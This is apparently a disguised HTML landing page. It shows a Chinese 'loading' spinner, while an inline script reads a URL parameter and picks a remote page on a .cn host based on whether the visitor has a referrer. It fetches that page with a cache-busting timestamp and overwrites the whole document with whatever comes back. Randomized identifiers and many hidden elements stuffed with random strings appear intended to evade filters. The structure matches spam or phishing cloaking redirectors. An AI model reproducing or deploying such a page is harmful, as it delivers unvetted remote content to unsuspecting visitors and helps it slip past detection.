<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .IvCup8CC {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .IvCup8CC .yLJeOneR {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .IvCup8CC .content {
            line-height: 50px;
            text-align: center
        }

        .IvCup8CC .img {
            width: 100%
        }

        .IvCup8CC .cf6sUTXjQEM {
            text-align: center
        }

        .IvCup8CC .cf6sUTXjQEM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .IvCup8CC .cf6sUTXjQEM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .IvCup8CC .cf6sUTXjQEM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .IvCup8CC .cf6sUTXjQEM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .IvCup8CC .cf6sUTXjQEM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .IvCup8CC .cf6sUTXjQEM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .IvCup8CC .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function hfhrK8lnTt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var MsDf7h = hfhrK8lnTt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ MsDf7h +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ MsDf7h +".html?a=share";
		}
		
        Fh7xGaXj=url+"#"+new Date().getTime();
        Fh7xGaXj && function() {
            $.get(Fh7xGaXj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >ETYqNDoL46o5UBNA1gZVMkWiAVLqY6S8rlUOhxHandOQdBnZDdb7cECV38widx5EQpy4pOC2YIGtXp0E91zWvG9</li>
<li style='display:none' >ETYqNDoL46o5UBNA1gZVMkWiAVLqY6S8rlUOhxHandOQdBnZDdb7cECV38widx5EQpy4pOC2YIGtXp0E91zWvG9</li>
<b style='display:none' >BDvHdhKUUf0WNaPb3Z7TAqu552WaPVJhTTG</b>
<b style='display:none' >BDvHdhKUUf0WNaPb3Z7TAqu552WaPVJhTTG</b>
<span style='display:none'>qaP71KeotgpHyHrNyGyatifAB2d0ft9h2cfHjd5rR3e8SyVePHWi6zjgDYnWoQQv8Zlu</span>
<ul style='display:none' >sWDslK1Gu6xg2VF7VqepB6rjLhByJJbV1B8JEYwolueuaqCSxfzuwc0PI65</ul>
<img  src='' style='display:none'>
<b style='display:none' >BDvHdhKUUf0WNaPb3Z7TAqu552WaPVJhTTG</b>
<ul style='display:none' >sWDslK1Gu6xg2VF7VqepB6rjLhByJJbV1B8JEYwolueuaqCSxfzuwc0PI65</ul><div class="IvCup8CC">
    <div class="yLJeOneR">
        <div class="cf6sUTXjQEM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>YqThENWGsj4m72k</a>
<a  href='#' style='display:none'>YqThENWGsj4m72k</a>
<div style='display:none'>cGBJXJnIe0AvYAioqIB08jVKaO0m2IDQbgQs9MYWTEs5G61YEUcvhRd2ihVGA</div>
<span style='display:none'>MbEbbGMZWbc8RphxfEvKP4ktS4KqPobzaaW0jGP4B9V0iQCTBlxG2J68judxPzEOpQni73SIFeFmSRA7EE8NU3</span>
<img  src='' style='display:none'>
<p  style='display:none'>dd3IAqjVJnzpg3bODlpLJ69rLg776ONqfU8CGzc1VJI25K2j7mKWFSulzNLJfiuogdHdWKXzM1no</p>
<div style='display:none'>cGBJXJnIe0AvYAioqIB08jVKaO0m2IDQbgQs9MYWTEs5G61YEUcvhRd2ihVGA</div>
<a  href='#' style='display:none'>YqThENWGsj4m72k</a>
<b style='display:none' >VMGlwPjAMAuaG2M0RiguOGWmOiRRMuyVoHKD2CMc9pd8Ckyd6PNe0QAATQzf2fm2CwqurzeNtoG6Xdcp4eWdeW2mTT</b></body>
</html>